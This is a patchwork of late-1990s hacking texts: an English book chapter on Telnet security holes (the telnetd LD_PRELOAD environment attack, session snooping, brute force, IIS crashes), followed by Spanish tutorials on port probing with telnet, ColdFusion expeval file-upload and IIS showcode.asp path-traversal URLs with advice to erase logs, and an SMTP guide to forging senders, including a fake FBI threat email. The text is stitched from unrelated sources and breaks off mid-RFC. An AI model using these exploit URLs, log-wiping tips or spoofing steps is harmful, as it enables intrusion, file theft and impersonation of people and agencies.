TIP: Such terminals are still sold on certain Usenet newsgroups. If you are a student with limited funds and you have been granted some form of Ethernet or even serial connection to your college's server, and if that server account is a shell account, get a terminal. For a mere $25-40, you can get high-speed access to the Internet. True, you cannot generally save materials to a disk, but you can print what is currently on the screen. You will not believe how quickly the screen will update. It is the absolutely ideal situation for Internet Relay Chat (IRC). These boxes are small, cheap, and fast. 
--------------------------------------------------------------------------------

The two best-known terminals were the Tektronix 4010 and the VT100 (also the IBM 3270, which is a bit different). Each had a set number of characters per line and lines per screen that could be displayed. In fact, most terminals usually had two settings. As terminals became more fancy, one could even set columns and, eventually, graphics (the Tektronix was graphics oriented).

Because these terminals became the standard method of connecting to mainframes, they also bled into the UNIX world. As such, all UNIX operating systems have keyboard and screen mappings for terminals. Mappings are descriptions of the screen and the keyboard settings (for example, how many lines and columns per screen or, more importantly, what Ctrl key sequences represent special characters). These are required because certain terminals use more keys than are offered on the standard PC or Mac keyboard. In addition to the regular typewriter keyboard and F function keys, there may be P keys that perform special actions, including the activation of menus and the navigation of the screen cursor in databases. To make up for this on PC, Mac, or even some UNIX keyboards, Esc or Ctrl sequences are defined. These are combinations of keystrokes that equal a P key. These key assignments are called key bindings, which are statements made within the program code that define what happens if this or that key combination is executed. Key bindings are a big part of programming, especially in C where you offer a semi-graphical interface (for example, where you use Borland's famous TurboVision libraries to create drop-down menus in a DOS application).

One can generally define key bindings in a program (at least, in a well written one). This gives the user application-level control over which keys do what. For example, perhaps the user can set the binding of the Ctrl key plus the letter F to perform a variety of functions. Some specialized applications actually ask the user to do so before launching the program for the first time. There is one such program--a freeware editor for UNIX, written in Germany--that allows you to completely remap the keyboard.

In UNIX, terminal mappings are generally stored in a file called termcap. The termcap library, reportedly introduced with Berkeley UNIX, is a very important addition to the system. Without it, many machines would not communicate well with each other. For example, if you perform a fresh install of a Linux operating system and do nothing to alter the TERM variable, it will be set to Linux. If you then Telnet to a SPARCstation (or other machine that also has its default TERM configuration), you will be unable to clear the screen with the well-known command clear. This is because the two terminal emulation settings are incompatible. Furthermore, if you try to execute a program such as PINE--which relies on compatible terminal types--the program will exit on error, reporting that the terminal is not supported. (SysV systems traditionally use terminfo as opposed to termcap.) 



--------------------------------------------------------------------------------
CAUTION: Many distributions of UNIX have complete termcap listings, which sometimes contain hundreds of terminal emulations. If you are new to UNIX and are toying with the idea of altering your termcap entries, be extremely careful. You may end up with bizarre results. In some cases, what once looked like nicely formatted text may appear as strange, disjointed, scattered blocks of words that are largely illegible. Study the man page before fiddling with your termcap file. 
--------------------------------------------------------------------------------

Many different environmental variables can be set. These variables can strongly influence how a remote machine will receive, process, and support your remote Telnet connection. Thus, the Telnet protocol was designed to allow the passing of certain environment variables at the time of the connection. As explained in RFC 1408: 

Many operating systems have startup information and environment variables that contain information that should be propagated to remote machines when Telnet connections are established. Rather than create a new Telnet option each time someone comes up with some new information that they need propagated through a Telnet session, but that the Telnet session itself doesn't really need to know about, this generic information option can be used. 


--------------------------------------------------------------------------------
Cross Reference: To view RFC 1408 in its entirety, visit http://sunsite.auc.dk/RFC/rfc/rfc1408.html. 
--------------------------------------------------------------------------------

The recent Telnet security hole was based on the capability of a Telnet server to receive, respond to, and authorize the passing of these environment variables. Because this option was so prominent in the UNIX system, an incredible number of platforms were vulnerable to this attack.

This vulnerability is more common than one would expect. In a rather engrossing report, one firm, Novatech, posted the results of an actual security audit of a network with 13 hosts. In it, the Telnet vulnerability appears, as do 138 other holes. The most extraordinary thing is that the site had already been assessed as having a clean bill of health, complete with a firewall. As Novatech's sample audit report notes: 

This is a copy of a actual attack report with definitions and possible rectifications of actual problems found. The network had a state of the art firewall installed and had been checked by CERT. As you can see there were many small problems and a number of larger ones as well. This was not the fault of the systems administration but of a mix that systems change and need constant attention and the lack of knowledge of how intruders gain access (a specialist field). We are able to check your system for nearly 390 different forms of access vulnerability all of which are Internet only type access. 


--------------------------------------------------------------------------------
Cross Reference: For those who have a "let's wait and see" attitude about security, I suggest that you go immediately to this site and view the results. They are astonishing. See the results of the audit at http://www.novatech.net.au/sample.htm. 
--------------------------------------------------------------------------------

The line that reveals the Telnet environment option vulnerability reads as follows:

Dynamic Linker Telnet Vulnerability [High Risk]2

This line reports that a Telnet vulnerability in the high risk category was found (in the audit cited previously, this vulnerability was found on two hosts within the same subnet). [High Risk]2 refers to the level of risk the hole represents. This is an extremely high risk vulnerability. Remember, this was found on a host with a state-of-the-art firewall!

To understand the method, you must understand precisely what options can be passed from the client to the server. One of these involves the passing of a custom libc. 



--------------------------------------------------------------------------------
NOTE: libc is the standard C library. A full distribution of libc commonly contains header and include files for use in C programming. All UNIX flavors have (or should have) this library installed. It is a requisite for compiling programs written in the C programming language. 
--------------------------------------------------------------------------------

As Sam Hartman of MIT notes in his article "Telnet Vulnerability: Shared Libraries": 

The problem is that telnetd will allow the client to pass LD_LIBRARY_PATH, LD_PRELOAD, and other run-time linker options into the process environment of the process that runs login. 


--------------------------------------------------------------------------------
Cross Reference: Find Hartman's article on the Web at http://geek-girl.com/bugtraq/1995_4/0032.html. 
--------------------------------------------------------------------------------

By passing the LD_LIBRARY_PATH environment option to the server, the cracker can add to this search path a custom directory (and therefore a custom library). This can alter the dynamic linking process, greatly increasing the chances of a root compromise. 



--------------------------------------------------------------------------------
NOTE: Hartman noted that if the target was using a Kerberos-aware telnetd, only users with a valid account on the remote box could actually implement the attack. My guess, however, is that the larger majority of machines out there are not using such a means of secure Telnet. 
--------------------------------------------------------------------------------

One interesting note about this hole: It was determined that one could identify Telnet sessions in which the environment variables had been passed by executing a ps instruction. However, one individual (Larry Doolittle) determined that on certain flavors of UNIX (Linux, specifically), one has to be root to ID those processes. In response to the Hartman report, Doolittle advised: 

Recent Linux kernels do not allow access to environment strings via ps, except for the user him/herself. That is, /proc/*/environ is protected 400. This could confuse people reading your instructions, since they would see environments for their own process but not root's. To verify environment strings of login, you need to run ps as root. 


--------------------------------------------------------------------------------

Cross Reference: Find Larry Doolittle's article on the Web at http://geek-girl.com/bugtraq/1995_4/0042.html. 
--------------------------------------------------------------------------------

Here are patches for various distributions of telnetd: 

DEC. (OSF/1): 
ftp://ftp.service.digital.com/public/osf/v3.2c/ssrt0367_c032 
A compressed version is available at 
ftp://ftp.ox.ac.uk/pub/comp/security/software/patches/telnetd/ 
Linux: 
ftp://ftp.ox.ac.uk/pub/comp/security/software/patches/telnetd/linux/telnetd 
Red Hat: 
http://www.io.com/~ftp/mirror/linux/redhat/redhat/updates/i386/NetKit-B-0.09-1.1.i386.rpm 
SGI (IRIX): 
ftp://sgigate.sgi.com/security/ 


--------------------------------------------------------------------------------
NOTE: Although patches have been issued for this problem, some other Telnet-related modules and programs may still be affected. As late as February, 1997, in.telnetsnoopd was reported as vulnerable to the LD_PRELOAD passing on some platforms, including Linux. There is reportedly a patch for this problem, and it has been uploaded to ftp://sunsite.unc.edu. 
--------------------------------------------------------------------------------

Garden-variety Telnet is not a particularly secure protocol. One can easily eavesdrop on Telnet sessions. In fact, there is a utility, called ttysnoop, designed for this purpose. As describe by its author, Carl Declerck: 

[ttynsoop] allows you to snoop on login tty's through another tty-device or pseudo-tty. The snoop-tty becomes a "clone" of the original tty, redirecting both input and output from/to it. 


--------------------------------------------------------------------------------
Cross Reference: Declerck's README for ttysnoop 0.12 (alpha) can be found on the Web at http://ion.apana.org.au/pub/linux/sources/admin/ttysnoop-0.12.README

--------------------------------------------------------------------------------




--------------------------------------------------------------------------------
NOTE: ttysnoop is not simply a Telnet-specific snooper; it snoops on the tty, not the Telnet protocol. A network sniffer like sniffit can also be used (and is probably more suitable) to sniff the Telnet protocol. 
--------------------------------------------------------------------------------

Telnet sessions are also especially sensitive. One reason for this is that these sessions are often conducted in an island-hopping pattern. That is, the user may Telnet to one network to tidy his or her Web page; from there, the user may Telnet to another machine, and another machine, and so on. If a cracker can snoop on such a session, he or she can obtain login IDs and passwords to other systems. 

Aren't These Attacks No Longer Effective?
No; this is due primarily to a lack of education. The environment option attack described previously is quite effective on many systems in the void. This is so even though advisories about the attack are readily available on the Internet. 

Telnet as a Weapon
Telnet is an interesting protocol. As explained earlier, one can learn many things using Telnet. For example, you can cull what version of the operating system is being run. Most distributions of UNIX will report this information on connection. It is reported by at least one authoritative source that various scanners use the issue information at connect to identify the type of system (SATAN being one such scanner). The operating system can generally be determined by attacking any of these ports: 

Port 21: FTP 
Port 23: Telnet (Default) 
Port 25: Mail 
Port 70: Gopher 
Port 80: HTTP 


--------------------------------------------------------------------------------
NOTE: Although I have only listed five ports, one can connect to the majority of TCP/IP ports by initiating a Telnet session. Some of these ports will remain in an entirely passive state while the connection is active, and the user will see nothing happen in particular. This is so with port 80 (HTTP), for example. However, you can issue perfectly valid requests to port 80 using Telnet and if those requests are valid, port 80 will respond. (The request needn't necessarily be valid. Issuing an erroneous GET instruction will elicit a lively response from the Web server if the request is sufficiently malformed.) 
--------------------------------------------------------------------------------

In their now-famous paper, "Improving the Security of Your Site by Breaking Into It," Dan Farmer and Wietse Venema point out ports that can be attacked. Specifically, they address the issue of port 6000: 

X windows is usually on port 6000...If not protected properly (via the magic cookie or xhost mechanisms), window displays can be captured or watched, user keystrokes may be stolen, programs executed remotely, etc. Also, if the target is running X and accepts a Telnet to port 6000, that can be used for a denial of service attack, as the target's windowing system will often "freeze up" for a short period of time. 


--------------------------------------------------------------------------------
Cross Reference: "Improving the Security of Your Site by Breaking Into It" can be found on the Web at http://stos-www.cit.cornell.edu/Mark_html/Satan_html/docs/admin_guide_to_cracking.html 
--------------------------------------------------------------------------------

In the paper by Farmer and Venema are many attacks implemented with Telnet alone or in conjunction with other programs. One such attack involves an X terminal: 

X Terminals are generally diskless clients. These are machines that have the bare minimum of hardware and software to connect to an X server. These are most commonly used in universities and consist of a 17" or 19" screen, a base, a keyboard and a mouse. The terminal usually supports a minimum of 4 megabyte of RAM but some will hold as much as 128 megabytes. X terminals also have client software that allows them to connect to the server. Typically, the connection is via fast Ethernet, hardwired to the back of the terminal. X Terminals provide high-speed connectivity to X servers, coupled with high-powered graphics. These machines are sold on the Internet and make great "additional" terminals for use at home. (They are especially good for training.) 
The Farmer-Venema X terminal technique uses a combination of rsh and Telnet to produce a coordinated attack. The technique involves stacking several commands. The cracker uses rsh to connect to the X terminal and calls the X terminal's Telnet client program. Finally, the output is redirected to the cracker's local terminal via the specification of the DISPLAY option or variable.

Another interesting thing that Telnet can be used for is to instantly determine whether the target is a real or virtual domain (this can be done through other methods, but none perform this function quite as quickly). This can assist a cracker in determining exactly which machine he or she must crack to reach your resources or, more precisely, exactly which machine he or she is engaged in cracking.

Under normal circumstances, a real domain is a domain that has been registered with InterNIC and also has its own dedicated server. Somewhere in the void is a box with a permanent IP address, and that box is attached permanently to the Internet via 28.8Kbps modem, ISDN, 56Kbps modem, frame relay, T1, T3, ATM, or perhaps, if the owner spares no expense, SONET. As such, when you Telnet to such a real site, you are reaching that machine and no other.

Virtual domains, however, are simply directories on a real server, aliased to a particular domain name. That is, you pay some ISP to register your domain name and create a directory on its disk where your virtual domain exists. This technique allows your_company.com to masquerade as a real server. Thus, when users point their browsers to www.your_company.com, they are reaching the ISP's server. The ISP's server redirects the connection request to your directory on the server. This virtual domain scheme is popular for several reasons, including cost. It saves your company the trouble of establishing a real server and therefore eliminates some of these expenses: 

Hardware 
Software 
24-hour maintenance 
Tech support 
Basically, you pay a one-time fee (and monthly fees thereafter) and the ISP handles everything. To crackers, this might be important. For example, if crackers are about to crack your domain--without determining whether your machine is truly a server--they may get into trouble. They think they are cracking some little machine within your internal offices when in fact, they are about to attack a large, well-known network provider.

Telnet instantly reveals the state of your server. When a cracker initiates a Telnet connection to your_company.com (and on connect, sees the name of the machine as a node on some other, large network), he or she immediately knows that your address is a virtual domain.

Moreover, Telnet can be used for other nefarious purposes. One is the ever-popular brute-force attack. I am not sure why brute-force attacks are so popular among young crackers; almost all servers do some form of logging these days. Nevertheless, the technique has survived into the 1990s. These attacks are most commonly initiated using Telnet clients that have their own scripting language built in. Tera Term is one such application.

Tera Term sports a language that allows you to automate Telnet sessions. This language can be used to construct scripts that can determine valid usernames on a system that refuses to cough up information on finger or sendmail-expn queries. Versions of Telnet reveal this information in a variety of ways. For example, if a bogus username is given, the connection will be cut. However, if a valid username is given, a new login: prompt is reissued. 



--------------------------------------------------------------------------------
Cross Reference: Tera Term can be found on the Web at http://tucows.phx.cox.com/files/ttermv13.zip. 
--------------------------------------------------------------------------------

Moreover, Telnet is a great tool for quickly determining whether a particular port is open or whether a server is running a particular service. Telnet can also be used as a weapon in denial-of-service attacks. For example, sending garbage to certain ports on an NT Web server under IIS can cause the targeted processor to jump to 100 percent utilization. Initiating a Telnet session to other ports on an NT Web server can cause the machine to hang or crash. This is particularly so when issuing a Telnet connection request to port 135. 



--------------------------------------------------------------------------------
Cross Reference: A fix for this problem, issued by Microsoft, can be found at ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postS 
--------------------------------------------------------------------------------

One can also crash Microsoft's Internet Information Server by Telnetting to port 80 and issuing a GET.../... request. Reportedly, however, that problem was remedied with the Microsoft Windows NT Service Pack 2 for Windows NT 4.0. If you do not have that patch/service pack, get it. A good treatment of this and other problems can be found in the Denial of Service Info post, posted by Chris Klaus of Internet Security Systems. In it, Klaus writes: 

The file sharing service if available and accessible by anyone can crash the NT machine and require it to be rebooted. This technique using the dot...dot bug on a Windows 95 machine potentially allows anyone to gain access to the whole hard drive...Solution: This vulnerability is documented in Microsoft Knowledge Base article number Q140818 last revision dated March 15, 1996. Resolution is to install the latest service pack for Windows NT version 3.51. The latest service pack to have the patch is in service pack 4. 


--------------------------------------------------------------------------------
Cross Reference: Visit the Denial of Service Info post at http://geek-girl.com/bugtraq/1996_2/0052.html.

--------------------------------------------------------------------------------




--------------------------------------------------------------------------------
NOTE: This was only a vulnerability in the Internet Information Server 2.0 World Wide Web server (HTTP). Later versions of IIS are reportedly clean. 
--------------------------------------------------------------------------------

Finally, Telnet is often used to generate fakemail and fakenews. Spammers often use this option instead of using regular means of posting Usenet messages. There are certain options that can be set this way that permit spammers to avoid at least some of the screens created by spam-killing robots on the Usenet network. 

Summary
Telnet is a very versatile protocol and, with some effort, it can be made secure. (I personally favor SSH as a substitute, for it prevents against snooped Telnet sessions.) Nevertheless, Telnet is not always secure out of the box. If you are using older software (pre 1997), check whether the appropriate patches have been installed.

Telnet can also be used in a variety of ways to attack or otherwise cull information from a remote host (some of those are discussed in this chapter). By the time this book is released, many more Telnet attack techniques will have surfaced. If you run a network and intend to supply your users with Telnet access, beware. This is especially so on new Telnet servers. These new servers may have bugs that have not yet been revealed. And, because Telnet is so interactive and offers the user so much power to execute commands on remote machines, any hole in a Telnet distribution is a critical one. It stands in the same category as FTP or HTTP in this respect (or is perhaps even worse). 





Los puertos y el telnet

Escrito por: Darth-Vai
Nivel: Básico
versión: 1.0
S.O.: windows

Este texto pretende ser una ayuda para los recién llegados al mundo del hack o para
los que quieran conocer un poco más sobre el funcionamiento de la red. Es de un nivel
 muy básico así que si ya llevas algún tiempo en esto será mejor que no sigas leyendo.



Te has preguntado alguna vez cómo hacen los hackers para entrar en otros sistemas
Como bien te imaginas un ordenador no sólo tiene el puerto 80 para que te conectes,
tiene multitud de puertos con distintas funciones de los que se puede sacar mucho
provecho :)

Al final del doc tienes una lista con los puertos mas importantes. Que te puedas
conectar a ellos o no, depende de si el server los tiene abiertos. Para comprobar por
qué puertos podemos acceder utilizaremos un escaneador de puertos, como por ejemplo el
portscan. Otra forma de comprobarlo es mediante telnet

/* también puedes usar otros programas de telnet como el CRT de www.vandyke.com que es
algo mas cómodo de usar */



El Telnet

Parece mentira que un programa tan simple pueda dar tanto juego. Pues bien, para
utilizarlo solo tenemos que ir a inicio - ejecutar - telnet.exe "ip a conectarte" puerto


Ej;  telnet ftp.unizar.es 21
     telnet 155.210.12.10 21

/* El comando Tracert: Este comando, que nos muestra la ruta por la que pasan nuestros
paquetes ip antes de llegar a su destino, nos puede ser muy util para conocer la IP de
algun ordenador que se encuentre en la misma red que el final, y que tenga menor
seguridad que el que deseamos atacar */

Has hablado mucho sobre el resto de los ordenadores, pero y el mio?, cómo puedo estar
seguro de que no hay nadie urgando en mi ordenador?
Pues con un simple netstat (c:\windows\netstat.exe) puedes comprobar las conexiones que
tienes abiertas, que no tienes ningun espavilao que se te ha metido por medio de un
troyano y demás.

Para tener control absoluto sobre las conexiones de tu ordenador se suele utilizar un
firewall (como por ejemplo el de www.signal9.com) Así detectarás a qualquiera que se te
quiera conectar por medio de un troyano (Back orifice 31337) (netbus 12345), te quiera
nukear o simplemete quiera ver que sistema operativo utilizas, pudiendo aceptar o
rechazar esas conexiones.

El puerto 110 (pop)

Es el que se utiliza para recibir el correo, mediante telnet se pueden entre otros
leer y borrar mensajes antes de que te los bajes con tu programa de correo. pongo un
ejemplo que se verá más facil.

telnet pop.arrakis.es 110

user obus
pass miclave

/* Si has puesto bien los datos de tu cuenta deberias estar ya conectado. */

los comandos que puedes utilizar son:
list                      /* para ver los mensajes que tienes en el buzón */
retr num_de_mensaje       /* leer mensaje */
dele num_de_mensaje       /* borrar mensaje */
stat                      /* estadísticas */

y ya sabes, para ver el resto como siempre, utiliza el comando help


El puerto 25 (smtp)
Se utiliza para mandar e-mails. Mediante telnet puedes elegir el nombre del que lo
envia, es decir, que puedes mandarle un mensaje a un amigo tuyo para que se crea que se
lo manda billgates@microsoft.com ,está muy bien para vacilar un poco y gastar alguna
bromilla, aunque si el que lo recibe se le ocurre mirar el codigo del mensaje, verá
perfectamente que los has mandado desde arrakis.es o desde donde lo hayas mandado. Así
que ya sabes, si quieres hacer algo ilegal por este metodo, ni se te ocurra!!!, que te
pillan antes de que te enteres ;)

telnet smtp.arrakis.es 25
helo pp.es                /* por cierto, éste dominio debe de existir en la red *

rcpt to: receptor@receptor.es
mail from josemariaznar@pp.es
data
[cuerpo del mensaje]      /* aquí hay que poner el contenido del mensaje, la primera
linea que pongas saldra en el subject o asunto del mensaje */

.                 /* cuando termines de escribir el mensaje pones un punto y pulsas
enter */
quit



Puerto 6668 (irc)

telnet irc.redestb.es 6668    /* tambien pueden funcionar otros como el 6667, 6669,
8888... */

pass laquequieras
nick obus
>ping 123456
pong 123456                /* respondeis al ping que os acaban de hacer */
user uno dos tres :javi    /* nombre_usuario nombre_host nombre_servidor :nombre_real */

join #@_2500hz             /* para entrar en un canal */

privmsg #@_2500hz :hola gente
privmsg DaMNaTiOn :wenas tiu ;)

el resto ya sabeis, le hechais un vistazo al comando help



Por cierto para resolver el nombre de una IP de numérica a nombre de host lo puedes
hacer por ejemplo en el mirc con un /dns

ej: /dns arrakis.es

*** Looking up arrakis.es
-
*** Resolved arrakis.es to 195.5.77.74


Nota para los usuarios de Linux;

Este doc os sirve igualmente ya que no depende del sistema operativo que utiliceis, el
telnet es practicamente igual, en vez del comando tracert se utiliza el traceroute, y
para resolver las ips lo podeis hacer con nslookup.




Escrito por:                                                          DaRth-Vai
                                                    When technology becomes art















COLD FUSION
Cold fusion es un software de servidor de aplicaciones web.
Creo ke este bug ya es algo conocido en la red asi ke me limitare a explicar un poco de ke va esto.
Gracias a un fallo del Cold Fusion podemos subir ficheros al servidor.
¿Ke ventaja tiene esto?
Muy sencillo, el tema es subir una web programada en cold fusion ke te permita tener acceso al HD de la makina remota.
Problemas a tener en cuenta

Cada intento de acceso a la makina remota se loguea, por lo tanto si entras tienes ke saber donde encontrar los log's para poder borrar tu acceso y de esa manera estar "fuera de sospecha" ;)
Parece sencillo ¿verdad?, pero tener en cuenta ke por muy bueno ke seas siempre habra uno mejor asi ke no intenteis nada extraño a ver si hos va a caer un buen marron.
En principio para subir ficheros al servidor seria de la siguiente manera:

http://www.servidor.com/cfdocs/expeval/openfile.cfm

Al cargar esta url te saldra en el navegador de internet ke utilices un formulario por el cual puedes subir ficheros de tu HD al HD remoto. Todo se loguea.

http://www.servidor.com/cfdocs/expeval/displayopenedfile.cfm

Con esto podreis grabar el fichero en la makina.

http://www.servidor.com/cfdocs/expeval/exprcalc.cfm

Muestra el contenido en una pagina web y despues borra el fichero.

Ejm:
Para poder ver el fichero "c:\fichero.txt" tendriamos ke introducir lo siguiente en el navegador:

http://www.servidor.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\fichero.txt

Esto es una introduccion muy breve y kizas no me he explicado con claridad ya ke la informacion del bug del Cold Fusion la he adquirido de la ReD pero me parecio interesante exponerla en este apartado web, ya ke no todos los usuarios de la ReD encuentran la informacion de la misma manera ;).

INTERNET INFORMACION SERVER (IIS)
Servidor web de mocochof pá wincows NT, el bug consiste en ke introduciendo lo adecuado en el navegador web se puede visualizar cualkier archivo del sistema remoto.

http://www.servidor.com/msadc/Samples/SELECTOR/showcode.asp

El Fallo consiste en este archivo asp.

Si keremos ver como es el codigo del archivo showcode.asp, tendriamos ke escribir lo siguiente en el navegador para poder visualizarlo:

http://www.servidor.com/msadc/Samples/SELECTOR/showcode.asp?source= /msadc/Samples/SELECTOR/showcode.asp

¿Se ha entendido la idea?
Pues dale a tu imaginacion a ver lo ke podrias hacer con eso sabiendo ke...
Con tal de ke aparezca en el inicio de la ruta source=/msadc/Samples/ podras escribir lo ke te venga en gana ;) como sacarle partio pos mira.

http://www.servidor.com/msadc/Samples/SELECTOR/showcode.asp?source= /msadc/Samples/../../../../../../fichero.txt

Creo ke kedo claro ¿no? pues bien... vuelvo a lo de antes. Hay ke tener en cuenta ke todo acceso permitido como no permitido en una makina remota es logueado asi ke no empeceis a probar asi por las buenas. Esta informacion la he sacado de la ReD y si la publico es solamente para ke los que utilicen los programas ke tienen estos fallos tengan un sitio mas donde puedan encontrar informacion sobre el bug de dichos progrmas mencionaus ;)
El protocolo SMTP 
Guia de Introduccion 
Private Release 0.1

Nombre del Protocolo
Simple Mail Transfer Protocol
Puerto Standard 
25
RFC
821,822
Uso General
Protocolo diseñado para el envio de correo
Otros Usos
Correo Anonimo , Bromas , Ingenieria Social
Que esSMTP?
El protocolo SMTP es el más usado por las aplicaciones de E.mail para enviar correos por la red. 
Cuando instalas y configuras tu aplicacion de correo electronico , en alguna parte , hay un dialogo que te pregunta por un servidor SMTP . Este servidor , normalmente con los nombres de maquina SMTP , mail o outgoing.mail , está dedicado unica y exclusivamente al envio de correo . Por ejemplo , figuremos que nuestro servidor es miserver.es , entonces , el servidor puede ser o SMTP.miserver.es , mail.miserver.es (o correo.miserver.es) o outgoing.mail.miserver.es (o salida.correo.miserver.es) . Si no sabes si tu Servidor de Salida de Correo (SSC) es un servidor SMTP puedes verificarlo de la siguiente manera. 
  
1.- Busca la direccion de tu servidor de correo en los papeles de tu servidor o en su web 
2.- Lanza tu aplicacion de Telnet preferida 
3.- Conecta con el SSC en el puerto 25 
4.-  Si recibes un mensaje parecido a este , tu SSC es SMTP compatible . Lo mas importante es el numero de tres cifras . En esta caso 220 
220-mail Sendmail 8.6.13/Netcom ready at Wed, 11 Sep 199610:30:32 -0700 
220 SMTPspoken here 
Te daras cuenta de que el segundo mensaje especifica directamente que el protocolo SMTP es el que usa esa maquina , pero no te preocupes si no te sale el segundo mensaje 220 , es normal que solo salga el primero. 
Una vez que ya sabes lo que es el SMTP , para que se usa y como verificar si un servidor es SMTP , podemos continuar . 
SMTP Inside
SMTP es un protocolo ASCII . ¿Por que perder ancho de banda con un protocol ASCII cuando con un par de bits puedes hacer lo mismo? Simple ; en los tiempos de la implementacion de este protocolo , la gente no contaba con interfaces graficos intiutivos y mucho menos con gente que se dedicase a crear aplicaciones para la entonces desconocida Internet (la llamaban ARPA net todavia) . Los usuarios siempre se veían forzados a establecer una conexion generica (raw) y con ella , mediante comandos , tomar el control del servidor y utilizarlo . Para ello , se utilizaba la aplicacion por excelencia en el mundillo del TCP/IP : El telnet. 
Dado que es un protocolo ASCII , los comandos y respuestas son cadenas de caracteres ASCII de 7 bits , y cada comando se termina con el codigo CRLF (Generado por la tecla ENTER) . Los comandos consisten en directivas cortas (4 letras) y los argumentos requeridos . Las respuestas estan precedidas de un codigo numerico de tres digitos  , un guion y una frase coloquial. De tal manera que una aplicacion de mail , con leer el numero , entiende lo que quiere decir el servidor y el humano que esta en frente de la terminal telnet sabe tambien lo que quiere decir el servidor 
La implementacion basica de un servidor SMTP consiste en siete comandos básicos. 
  
Command
Arguments
Explanation
HELO
<un_host_cualquiera>
Este comando especifica la direccion de la maquina desde la que se envia el mail
MAIL
FROM:<sender@address.dom>
Especifica la direccion de correo del remitente
RCPT
TO:<receiver@address.dom>
Especifica la direccion de correo del destinatario
DATA
 
Este comando inicia la escritura del mensaje
RSET
 
Este comando aborta y borra todo el contenido del mensaje , toda nocion de la escritura y conexion a esa maquina se borran y se da un mensaje 220
NOOP
 
Este comando sirve unica y exclusivamente para que el servidor te responda con un OK
QUIT
 
Alguna pregunta sobre esta?
Ahora que tenemos una pequeña nocion sobre comandos basicos del SMTP podemos experimentar un poco. 
La primera vez que te conectes a un SSC SMTP , tendras que mirar si tiene Eco Remoto o si por el contrario tienes que poner en ON el Eco Local. El Eco remoto es cuando todo caracter que escribes en la aplicacion es enviado al servidor , procesado y devuelto a tu ordenador para que se escriba en pantalla . Esto suena logico pero esta desapareciendo en los SMTP ya que dia a dia son cada vez mas los programas de SMTP y menos lo usuarios que usan el SMTP con una conexion generica usando telnet . Si tu servidor no admite Eco remoto , tendras que poner en ON el eco local en tu aplicacion para poder ver lo que escribes. Cuidado si tiene eco remoto y pones el eco local , ya que se escribira en pantalla todo dos veces. 
  
Este es un ejemplo de como seria una conexion con un SSC SMTP via telnet. 
  
Leyenda 
El texto de este color es el que genera el ordenador local 
El de este color es el que el usuario escribe 
Y el de este es el generado por el servidor 
Y finalmente el texto de este color son los comentarios  :) 
Transcripcion de una conexion con el SSC digitec.net:25 
>Telnet digitec.net:25 
-Connecting to digitec.net port 25- 
220 nexus-4.digitec.net ESMTP server (digitecmail v3.1.2 UNIX 99 (PO203-101c) #1 
999-31337L) ready Mon, 22 Feb 1999 21:01:59 +0000 
HELO lolaine.digitec.net                           Aki le dices el Host de Destino 
250 nexus-4.digitec.net 
MAIL FROM:lolaine@digitec.net                      Aki le pones la direccion del remitente 
250 Sender <lolaine@digitec.net> Ok 
RCPT TO:idmo@usa.net                               y aki la del destinatario 
250 Recipient <idmo@usa.net> Ok 
DATA                                               And ask for a prompt for writting 
354 Ok Send data ending with <CRLF>.<CRLF> 
Hi idmo! 
What about those docs you talked about on irc? 
Are they trully interesting? 
It would be great if you could send them to me. 
so I can look into them 
If I find something interesting , I´ll notice it to you 
Oh , yes , where did you took them from ? 
Thanks. 
Lolaine 
lolaine@digitec.net 
SENT USING Telnet :)                               hehehe :)) Tiempo de chistes :) 
LXA 
.                                                  hey! Temine el mensaje ! 
250 Message received: 19990222210159.AAA149@lolaine.digitec.net 
QUIT                                               Oh oh, es tarde ... nos vemos! 
-Connection with digitec.net closed- 
  
Bueno ... no fue dificil , no? 
Ahora podemos tomar cuatro conclusiones 
   1.- El protocolo SMTP es FACIL de usar por telnet 
    2.- Te puedes inventar el host desde el que escribes 
    3.- Tambien la direccion del remitente!!!! 
    4.- Una vez escrita una frase , esta es inamovible ... si quieres cambiar algo tendras k usar RSET 
Esto significa que si quieres echar una risas con un amigo el dia de los inocentes puedes hacer una de este tipo 
>Telnet digitec.net:25 
-Connecting to digitec.net port 25- 
220 nexus-4.digitec.net ESMTP server (digitecmail v3.1.2 UNIX 99 (PO203-101c) #1 
999-31337L) ready Mon, 22 Feb 1999 21:15:59 +0000 
HELO fbi.gov 
250 nexus-4.digitec.net 
MAIL FROM: computers_division@fbi.gov 
250 Sender <lolaine@digitec.net> Ok 
RCPT TO:idmo@usa.net 
250 Recipient <idmo@usa.net> Ok 
DATA 
354 Ok Send data ending with <CRLF>.<CRLF> 
    Dear Citizen. 
    Rumours that you are involved into Nuclear Weapons re-selling had 
    reachen our offices.If we can confirm this , you will be arrested 
    in 24 hours.Don´t move from your house , you are under continue 
    vigilance and all your movements are being recorded. Your phone 
    modem & refrigerator x`D are being controlled. 
    You can´t Escape 
    Good Morning 
    John Redlum 
    FBI Computers Division WHQ 
. 
250 Message received: 19990222211559.AAB149@lolaine.digitec.net 
QUIT 
-Connection with digitec.net closed- 
Y segundos despues tu amigo estara tendido en el suelo hasta que se decida mirar , volver a mirar y remirar el mensaje hasta que encuentre este trozo de texto y diga ARRGGH!!!! 
              ... from fbi.gov [212.25.130.22] by nexus-4.digitec.net (digitecmail MTA v3.1.2 UNIX 99 (PO203-101c) 
                #1999-31337L) with SMTP id AAB30582 for <lolaine@digitec.net>; Sun, 21 Feb 1999 18:55:11 
                +0000 
Por supuesto , 212.25.130.22 no es la direccion de un ordenador del FBI y mucho menos digitec.net su servidor de correo ! Si sabe un poquito de redes tu amigo , se dará cuenta de que ha sido objeto de una broma . 
Es divertido enviar mensajes de este tipo , pero recordad que es ilegal , ya que estas suplantando la personalidad (hombre , por enviar un mail desde monica@whitehouse.gov para echar unas jajas no te va a perseguir el FBI) 
  
Ahora incluyo los comandos del SMTP tal y como estan en el documento RFC 821. Esto está en ingles , no me apetece traducir esto con 38 de fiebre y en la cama con el iMac . Si alguien se anima , que contacto conmigo 
  
  
HELLO (HELO) 
            This command is used to identify the sender-SMTP to the 
            receiver-SMTP.  The argument field contains the host name of 
            the sender-SMTP. 
            The receiver-SMTP identifies itself to the sender-SMTP in 
            the connection greeting reply, and in the response to this 
            command. 
            This command and an OK reply to it confirm that both the 
            sender-SMTP and the receiver-SMTP are in the initial state, 
            that is, there is no transaction in progress and all state 
            tables and buffers are cleared. 
 Sintax: HELO <SP> <domain> <CRLF> 
 
 MAIL (MAIL) 
            This command is used to initiate a mail transaction in which 
